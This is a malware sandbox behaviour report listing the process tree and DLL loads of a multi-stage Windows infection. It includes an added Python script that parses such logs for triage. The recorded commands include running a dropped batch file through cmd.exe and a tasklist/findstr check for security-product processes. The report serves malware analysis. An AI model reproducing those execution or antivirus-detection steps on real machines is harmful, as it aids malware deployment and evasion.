Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\1000003002\ead6a72944.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 --field-trial-handle=2404,i,6116549712235558753,12862378424519255312,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2072,i,12084099025757561661,8900613295013787749,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2240 -parentBuildID 20230927232528 -prefsHandle 2124 -prefMapHandle 2140 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bf760f3-4a16-4712-bdf3-1a7919266e26} 7092 "\\.\pipe\gecko-crash-server-pipe.7092" 26181e6b310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2932 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
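The two entry types in this listing, "Process created" and "Section loaded", are flat text, so the per-process view a triager actually wants (which dropped binary loaded which capability DLLs, and who spawned whom) has to be rebuilt from them. The script below is an added example, not part of the report or of any sandbox product: it parses lines in exactly this format into an ordered, de-duplicated module list per process and a parent/child table, then annotates modules whose presence says something about what the process can do. The sample lines are constructed from entries in this report, and the INDICATOR_DLLS table is this example's own reading of those modules, not something the sandbox emits.

```python
"""Added example (not part of the report): turn Joe Sandbox-style
"Process created" / "Section loaded" lines into a per-process view.

Assumptions: the two line formats match the report text exactly, and
INDICATOR_DLLS is this example's own annotation table, not the sandbox's."""
import re
from collections import defaultdict

# Constructed sample in the report's own format (paths taken from the report).
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
""".strip().splitlines()

LOAD_RE = re.compile(r"^Source: (?P<proc>.+?) Section loaded: (?P<dll>\S+)$")
PROC_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<child>.+)$")
LINK_LABEL = " Jump to behavior"  # HTML link text that trails some entries in the report

# What a load of each module implies about the process (this example's table).
INDICATOR_DLLS = {
    "mscoree.dll": ".NET CLR host: the image is a managed (.NET) executable",
    "amsi.dll": "AMSI client initialised in-process (the .NET 4.8 CLR does this for assemblies loaded from memory)",
    "wbemcomn.dll": "WMI client library: the process issues WMI queries",
    "dpapi.dll": "DPAPI: can unprotect the user's DPAPI-wrapped secrets (browser key stores use it)",
    "rstrtmgr.dll": "Restart Manager: can find and release handles holding a file open (locked browser databases)",
    "ncrypt.dll": "CNG key storage: certificate/key operations, typically via Schannel TLS",
    "wininet.dll": "WinINet HTTP stack: the process talks HTTP(S) itself",
    "winhttp.dll": "WinHTTP stack: the process talks HTTP(S) itself",
    "mstask.dll": "Task Scheduler 1.0 client: scheduled-task creation is possible",
    "mozglue.dll": "Mozilla support library, not a Windows DLL: a non-Firefox process loading it is reading Firefox profile data",
}


def split_child(child):
    """Split the 'Process created' payload into (child image, command line)."""
    if child == "unknown unknown":  # the report's token for a child it did not capture
        return "unknown", "unknown"
    if ' "' in child:  # image path, then the quoted command line
        image, rest = child.split(' "', 1)
        return image, '"' + rest
    image, _, rest = child.partition(" ")
    return image, rest


def parse(lines):
    """Group the listing by process: first-load order per process and parent/child edges."""
    loads = defaultdict(list)     # process image -> modules in first-load order, de-duplicated
    children = defaultdict(list)  # parent image -> [(child image, command line), ...]
    for raw in lines:
        line = raw.strip()
        if line.endswith(LINK_LABEL):
            line = line[: -len(LINK_LABEL)]
        m = LOAD_RE.match(line)
        if m:
            if m["dll"] not in loads[m["proc"]]:
                loads[m["proc"]].append(m["dll"])
            continue
        m = PROC_RE.match(line)
        if m:
            children[m["parent"]].append(split_child(m["child"]))
    return dict(loads), dict(children)


def flag(loads, table=INDICATOR_DLLS):
    """Per process, the loaded modules present in the indicator table, with their notes."""
    return {proc: [(d, table[d]) for d in dlls if d in table] for proc, dlls in loads.items()}


def report(lines):
    """Human-readable summary: annotated module hits per process, then the process tree edges."""
    loads, children = parse(lines)
    out = []
    for proc, hits in flag(loads).items():
        if hits:
            out.append(proc)
            out.extend(f"  {dll}: {note}" for dll, note in hits)
    for parent, kids in children.items():
        for image, cmd in kids:
            out.append(f"{parent} -> {image}" + ("" if image == "unknown" else f" [{cmd}]"))
    return "\n".join(out)


if __name__ == "__main__":
    print(report(SAMPLE_LINES))
```

Run it over the whole behaviour listing of a report rather than this excerpt. The ordered module list per process (mscoree.dll followed by amsi.dll and wbemcomn.dll for buildred.exe, for instance) is a compact fingerprint that can be compared across runs of related samples, and the indicator notes are hypotheses to check against the report's other sections before calling a capability, not conclusions on their own.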
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: kernel.appcore.dll
